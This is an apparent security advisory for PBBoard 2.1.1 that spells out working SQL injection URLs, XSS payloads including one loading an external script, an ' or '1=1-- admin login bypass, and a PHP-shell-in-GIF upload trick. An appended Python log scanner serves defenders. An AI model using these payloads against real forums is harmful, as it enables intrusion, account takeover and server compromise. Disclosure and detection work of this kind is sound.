PBBoard 2.1.1 SQL Injection / Cross Site Scripting / Shell Upload

Type packetstorm
Reporter jiko
Modified 2010-09-28T00:00:00


PBBoard 2.1.1 Multiple Remote Vulnerabilities  
|=-------------=[ JIKO |No-exploit.Com| ]=-----------=|  
Home :No-exploit.Com  
Mail : !x!  
name :PBBoard_v2.1.1  
link :http://www.pbboard.com/PBBoard_v2.1.1.zip  
Upload of shell and .exe files, etc. :(  
Select "From my PC"  
and upload your PHP shell with GIF89a; you can see the size of the img is long; use a program to insert PHP code in the img  
SQL & XSS  
all scripts are infected :(  
insert '( in all % variables in the script  
SQL :/index.php?page=forum&show=1&id=2'a  
XSS :/index.php?page=forum&show=1&id=2'a<br>hello <script>alert(123)</script>  
SQL :/index.php?page=profile&show=1&username=jawad'  
SQL :/index.php?page=profile&show=1&username=jawad' and id='1  
XSS :/index.php?page=profile&show=1&username=jawad'a<br>hello <script>alert(123)</script>  
XSS in Profile  
Url :/index.php?page=usercp&control=1&avatar=1&main=1  
Select img From Url  
http://"><SCRIPT/XSS SRC="http://no-exploit/xss.js"></SCRIPT>.gif  
Login :(  
User : real name of admin or member you want | jawad' or '1=1--  
Pass : jiko  
for admin panel  
Url : /admin.php  
User : jawad' or '1=1--  
Pass : jiko  
:((..Etc exploit  
All my friends  
|No-Exploit.com Members
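
For defenders reviewing a PBBoard 2.1.1 install, the following is an added example (not part of the advisory and not PBBoard code) that flags the request shapes listed above in web-server logs and checks uploaded "images" for an embedded PHP open tag. The function names, the choice of `id` and `show` as digit-only parameters, and the sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: these parameters carry only digits in normal use (they do in the advisory's URLs).
NUMERIC_PARAMS = {"id", "show"}
SCRIPT_RE = re.compile(r"<\s*script", re.I)
PHP_TAG_RE = re.compile(rb"<\?(php|=)", re.I)
GIF_MAGIC = (b"GIF87a", b"GIF89a")

def classify_request(url):
    """Return sorted findings for one request URL (percent-encoding is decoded first)."""
    findings = set()
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not value.isdigit():
            findings.add("non-numeric " + name)
        if "'" in value:
            # A lead for review, not a verdict: names such as O'Brien are legitimate.
            findings.add("quote in " + name)
        if SCRIPT_RE.search(value):
            findings.add("script tag in " + name)
    return sorted(findings)

def suspicious_upload(data):
    """True when bytes that start like a GIF also contain a PHP open tag."""
    return data[:6] in GIF_MAGIC and PHP_TAG_RE.search(data) is not None

def scan(urls):
    """Map each flagged URL to its findings; clean requests are omitted."""
    return {u: f for u in urls if (f := classify_request(u))}

# Constructed sample requests, modelled on the URL shapes listed in the advisory.
SAMPLE_URLS = [
    "/index.php?page=forum&show=1&id=2",
    "/index.php?page=forum&show=1&id=2%27a",
    "/index.php?page=forum&show=1&id=2%27a%3Cbr%3E%3Cscript%3Ealert(123)%3C/script%3E",
    "/index.php?page=profile&show=1&username=jawad%27",
]

if __name__ == "__main__":
    for url, findings in scan(SAMPLE_URLS).items():
        print(url, "->", ", ".join(findings))
    print(suspicious_upload(b"GIF89a;<?php /* constructed */ ?>"))
```

Log matching of this kind only surfaces probing; the underlying fixes are parameterized queries, output encoding, and re-encoding uploaded images while serving them from a location where PHP is not executed.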